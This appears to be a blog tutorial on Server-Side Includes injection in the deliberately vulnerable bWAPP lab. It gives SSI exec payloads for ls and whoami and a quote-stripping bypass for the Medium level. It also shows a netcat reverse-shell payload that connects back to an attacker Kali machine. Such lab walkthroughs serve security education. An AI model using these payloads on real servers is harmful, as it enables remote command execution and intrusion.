Server-Side Includes (SSI) Injection – (bWAPP Level: Low/Medium)

Hello cyberman!

The content of this article will be on Server-Side Includes or SSI Injection. 

 

What Is The SSI Injection?

On the server side, the named vulnerability program is the controls that proceed through feeding the web pages to be created with html with dynamic content. 

What Kind Of  Damage Is This Vulnerability?

 It can cause problems such as redirecting on the WEB site, running commands on the server side. Today, this vulnerability is not seen very often. 

How Is It Detected?

With the SSI language used with the characters, it can be tried in the areas where input and output are made on the pages.
Character: “< ! # = / . ” – > and [a-zA-Z0-9]”

For example: When a website is searched and “<!– cmd =”ls”–>” command is entered, the command can be output on the screen.

How To Exploit This Web Vulnerability?

The bWAPP application will be used to give an example.
bWAPP is a linux distribution and website that contains various vulnerabilities.

Click to download bWAPP.

Virtual machine setup and bWAPP setup will not be explained in this article.

 

After the installation, the vulnerability is selected as seen in the picture above.

When the desired values are entered into the fields on the screen, the IP address of our computer will be displayed.

As seen in the field above, it gave the IP address of our system.

List of sample topics for SSI Injection:

Now is the time to exploit the vulnerability! Let’s enter the command “<!–#exec cmd=”ls”–>” in the name or surname field.

Since the command to be sent to the server is “ls”, its output will now be a list of the folder inside the page.

As seen in the picture above, the inside of the folder has been viewed.
Such information theft is possible.

Now let’s think like a hacker.
Actually, we just entered a command in the terminal. If we can enter commands, then let’s find out which user we are connected to on the server computer.
Command to enter: “<!–#exec cmd=’whoami’ –>”

When we enter the command as above, we will get the following result:

As you can see our username is “www-data”. Now, let’s open a shell on the server computer.

Command for shell:  <!–#exec cmd=”nc -nv <attacker_machine_ip_address> 5555 -e /bin/sh” –>

But first, let’s open our kali linux machine. And let’s find out our IP address.

As seen in the picture above, the IP address of our kali machine is 192.168.1.8.
Now, it is necessary to use a port to open a shell terminal. I will use the “5555” port. The name of the software to use for the shell: “NetCat” or “nc” or “ncat” or “telnet” all the same.

It is a very high quality software. Click for topics and details.

 

“nc -nlvp 5555” command was entered to open port on our Kali machine. Now, let’s enter the above command on the website.

As seen in the picture above entered command. And connect come its.

Now, connected to 192.168.1.226, that website address. Now, we entered server system. 

Let’s running command: “ls” on Kali Machine.

Result as seen in the picture above. we doing it if want everything. Because we entered server system.

 Let’s Set The Difficulty Level To Medium.

This may vary from page to page, but here now when we enter the same command, it will block us. 

For this, it will be enough to change the double quote character that needs to be done. It will be sufficient to log in by removing the (“) character.

For example: <!–#exec cmd=whoami –>

The result will be like the picture above. The page developer can take various measures.
For example: Changing special characters or encoding html.

Have a nice day with lots of informatics 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *